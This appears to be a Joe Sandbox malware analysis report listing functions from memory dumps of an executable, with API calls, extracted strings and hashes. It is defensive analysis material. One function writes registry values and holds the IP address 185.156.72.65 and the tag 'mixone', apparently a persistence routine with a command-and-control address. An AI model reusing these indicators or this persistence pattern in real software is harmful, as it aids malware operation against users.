                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                      • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                      Function 0494EE2E Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction ID: fa01a4797d1f63c394b1f7f654db9bb519510f43bc4b30c868f50a83e00bf471
                      • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction Fuzzy Hash: F0B18F71A0060B8BDF24CF68C958EBEBBA9FFC4304F140A79D59297694D731BA41CB61
                      Function 0040EBC7 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                      • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                      Function 00471E5D Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: l
                      • API String ID: 0-2517025534
                      • Opcode ID: 041e995513071af677990e4e1143d78a093c717db1e527a5d5acdfb2364982f5
                      • Instruction ID: 80c78eb767583b2a25c92f62957132076a0ec1ea736585b92347e1ab35decde6
                      • Opcode Fuzzy Hash: 041e995513071af677990e4e1143d78a093c717db1e527a5d5acdfb2364982f5
                      • Instruction Fuzzy Hash: 63818BB3F1112547F3644D28CCA836266939BA5324F3F82798E9D6B7C5E93E5C0A53C4
                      Function 0494A987 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0494A30B), ref: 0494A98C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      Function 0040A720 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      Function 00418592 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                      • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                      Function 00415E59 Relevance: .6, Instructions: 637COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                      • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                      Function 00473D15 Relevance: .2, Instructions: 225COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3bce8d9d21c66108ab0b7d3082d5403f4f1fd3df21b405bebc1e491d6af9186
                      • Instruction ID: affea146308bd21a2d3fe8175c3ab1cc6f28d84fd5c3b880d276b43b5cbd0736
                      • Opcode Fuzzy Hash: a3bce8d9d21c66108ab0b7d3082d5403f4f1fd3df21b405bebc1e491d6af9186
                      • Instruction Fuzzy Hash: AC515EB250811E9FDB21CF24C5401EF3BA1EB56362F34C02BD84987A41D37A4E17EA9E
                      Function 004826C8 Relevance: .2, Instructions: 215COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fe6fc5ecf26c025115b89b2a35fdb2f0d1cde9dc8939ac68aa749d605309f15
                      • Instruction ID: 6351d2fc5d6baa9902321f587f25a7a5170b5054951892fcf7be59a2ba45daa4
                      • Opcode Fuzzy Hash: 5fe6fc5ecf26c025115b89b2a35fdb2f0d1cde9dc8939ac68aa749d605309f15
                      • Instruction Fuzzy Hash: C971BFF3F1112647F3544939CD583A166939BD2324F2F42788F5C6BBC5E97E4D0A6288
                      Function 00486E74 Relevance: .2, Instructions: 206COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d5e4807c8a3368373eff35d2c3ba732129111b920281cc8dc46cedf19ce93b4b
                      • Instruction ID: 469bfd461bb50847dc519f101d8e1c8120ca04b759066b8bfda27f6e6b99b6e1
                      • Opcode Fuzzy Hash: d5e4807c8a3368373eff35d2c3ba732129111b920281cc8dc46cedf19ce93b4b
                      • Instruction Fuzzy Hash: EB515DF39085108BE3006E2CDC5576AB7E6EF94720F1B892DEAC5D3744E9358845C7C2
                      Function 004863DE Relevance: .2, Instructions: 204COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4b0f63741f5cc1f635e3187dd2446e90507181670ebe09b6f0c652189ddf23f0
                      • Instruction ID: 42156322980c1bd1773421d396cc48983ff7d2e8a08edef940d8a77b2a72ae5f
                      • Opcode Fuzzy Hash: 4b0f63741f5cc1f635e3187dd2446e90507181670ebe09b6f0c652189ddf23f0
                      • Instruction Fuzzy Hash: 9B512AF3A082044BE3446E7DDC9573BB6D6ABE4320F5A863D9B86D33C4F97598064286
                      Function 004D13D7 Relevance: .2, Instructions: 184COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a995b58179b35eae7a4afbf082ec4f8f8d9b0663cf18cfa0c97385a2e73e04a5
                      • Instruction ID: 33531d40a9a3a4c6a0ec032cd9d10f97c7738953c7994d16ae88e612bb9a2435
                      • Opcode Fuzzy Hash: a995b58179b35eae7a4afbf082ec4f8f8d9b0663cf18cfa0c97385a2e73e04a5
                      • Instruction Fuzzy Hash: A45128B3B0C1046FF319591AEC45BBBB79BDBC4330F2AC13EE68193748D93A58064696
                      Function 0061D3D3 Relevance: .2, Instructions: 159COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 671134a5f0ae57437e06a67170d91840f0151b90c8ec1c982481ef4e6251892d
                      • Instruction ID: 4aaeef5ae34a85ad1e6d337daa2bf6c5f7bdd46d51165e367e3a4679ce31dc5f
                      • Opcode Fuzzy Hash: 671134a5f0ae57437e06a67170d91840f0151b90c8ec1c982481ef4e6251892d
                      • Instruction Fuzzy Hash: 4951F5B390C614DFD3006E29D8806BAFBE7EB94354F2A452DD5C687704E6355982EB83
                      Function 004A9AC3 Relevance: .2, Instructions: 155COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3fc3ad2e6f20feb2771a0d77fff123a1224ef77451555be1b0c0000c9cddfa86
                      • Instruction ID: b5f68d58a424befbc09e837e50dc9cc9bb2a6f778cf5b56706e127b5342590df
                      • Opcode Fuzzy Hash: 3fc3ad2e6f20feb2771a0d77fff123a1224ef77451555be1b0c0000c9cddfa86
                      • Instruction Fuzzy Hash: F751AFB3F1102547F3544939CD183A16693DBD5320F2F82788F9C6BBD9D87E5D0A6288
                      Function 005745EF Relevance: .1, Instructions: 143COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2efa30ad9198466f7438ef251b118c18b024ee10b67b405349c0ab16f8fbe5dd
                      • Instruction ID: 97c1ff55b5c714025d1096ef9b2d668eea180e0867616f272ff4c6cc565b3949
                      • Opcode Fuzzy Hash: 2efa30ad9198466f7438ef251b118c18b024ee10b67b405349c0ab16f8fbe5dd
                      • Instruction Fuzzy Hash: D3418BF3A086144FE3046E29DC4577AB7E6FFD0320F2B863DCAD583744E83508028686
                      Function 005C0936 Relevance: .1, Instructions: 142COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dbef5d7bef59b43be5dfa8edd5703d8ccb9a77abc700a4ce04d59e9719422d3f
                      • Instruction ID: 4f991775fd075f8e442a30bf71a6a0abb8bd3355318921d4ba1c8722690bbe59
                      • Opcode Fuzzy Hash: dbef5d7bef59b43be5dfa8edd5703d8ccb9a77abc700a4ce04d59e9719422d3f
                      • Instruction Fuzzy Hash: E74106F3D046145BE344AE2CCC4536ABAD6AB64710F1B453C9FC8D3780EA7D990487C6
                      Function 004E8D69 Relevance: .1, Instructions: 140COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dc73e0da1c097c42129b8bd368551c9eeef649b30d4240c0eb39a7d2c49c9dd8
                      • Instruction ID: 0a5ecd0bcd589ae5c5a198e7f216788362b8199b10ceada31136a7f7796fccf0
                      • Opcode Fuzzy Hash: dc73e0da1c097c42129b8bd368551c9eeef649b30d4240c0eb39a7d2c49c9dd8
                      • Instruction Fuzzy Hash: B74152B3F112264BF3544939CD583A265839BD5311F2F82788B4CABBC9D87E9C0A5388
                      Function 00569F3C Relevance: .1, Instructions: 134COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cc6edaedf4e213ac50b3d70a713bb6229f104d50b48382c5bb92e6d842ece600
                      • Instruction ID: cabdfe5584b24cf45efc7144704cdbcb7e4788fe998356dc4fe4bec9e6164b13
                      • Opcode Fuzzy Hash: cc6edaedf4e213ac50b3d70a713bb6229f104d50b48382c5bb92e6d842ece600
                      • Instruction Fuzzy Hash: AD4107F3E186144FE308AE38CC5573ABBD6EB94310F17863DDAC597788E93858058786
                      Function 0054BB72 Relevance: .1, Instructions: 130COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01582404b4d2c2ede1d9a33a93a86e7fa08d83f64a716f04567e726049ee32f7
                      • Instruction ID: b67df950e62a6892fd4607e841d797f97a02fa90efffa398d6723887ec454862
                      • Opcode Fuzzy Hash: 01582404b4d2c2ede1d9a33a93a86e7fa08d83f64a716f04567e726049ee32f7
                      • Instruction Fuzzy Hash: 774123F3B582045BF348693CDD6937A76D6CB90320F1E463EEA86C77C4EC3998094256
                      Function 0494B937 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: fa6b4651d7221cff094baf480b42453b6c69c455708c8eaf66ed9c9ed1b57600
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: E6112B7720014243DA598AFED4B4EB6F79DEFC5329B2C477AD0858B75AE122F144E600
                      Function 0040B6D0 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                      Function 04797D41 Relevance: .1, Instructions: 61COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: 8a5cd3a7b95f6d1cedb65045da1f90a52a61a6071a3ad4ec5084ba056dedaf80
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: DC117072350100DFDB58DE55EC90FA673EAEB89620B1D8056E904CB315E675EC01C760
                      Function 006FB165 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000006FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6fa000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb66d49b8d920b6dc757a4e6732170c6e5a3c9dd37fcf2de5c74cf024db9d879
                      • Instruction ID: 32663fe22704bb70b5c1d01a85cb45771ff41330a53144533dff5a1cac0bd739
                      • Opcode Fuzzy Hash: bb66d49b8d920b6dc757a4e6732170c6e5a3c9dd37fcf2de5c74cf024db9d879
                      • Instruction Fuzzy Hash: D9F02EF628820FBDB201C645D675976B76FFA53374730A069F702C5001E3A09505B634
                      Function 04940D90 Relevance: .0, Instructions: 43COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction ID: 2429803e5c0a4337ea3c502ce323077035bac9e0c6282ea3a7e09db8bb15e051
                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction Fuzzy Hash: 6201A276A006149FDF21CF24CC08FAB33F9EFC6216F4544B5EA0A9B281E774B9458B90
                      Function 00409BDD Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                      • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                      • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                      Strings
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                      • kernel32.dll, xrefs: 00409C00
                      • WakeAllConditionVariable, xrefs: 00409C1D
                      • SleepConditionVariableCS, xrefs: 00409C11
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 2565136772-3242537097
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                      Function 0041C3CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                      • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                      Function 0494BF62 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0494C081
                      • ___TypeMatch.LIBVCRUNTIME ref: 0494C18F
                      • _UnwindNestedFrames.LIBCMT ref: 0494C2E1
                      • CallUnexpected.LIBVCRUNTIME ref: 0494C2FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: d19d3c771868f603bdc4c70fa1cf47813a2bd2109d9732880470e4b32eaa9460
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 1CB14571902209EFDF29DFA4C880DAEB7B9BF88314F16416AE8116B211D771FA51CF91
                      Function 0040BCFB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                      • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                      • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                      • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                      Function 004058F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122registrysleepCOMMON
                      Download Yara Rule
                      APIs
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateOpenSleepValue
                      • String ID: 185.156.72.65$185.156.72.65$mixone
                      • API String ID: 4111408922-485810328
                      • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                      • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                      Function 04949E44 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04949E22), ref: 04949E50
                      • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04949E22), ref: 04949E5B
                      • GetModuleHandleW.KERNEL32(0042000C,?,?,04949E22), ref: 04949E6C
                      • GetProcAddress.KERNEL32(00000000,00420028), ref: 04949E7E
                      • GetProcAddress.KERNEL32(00000000,00420044), ref: 04949E8C
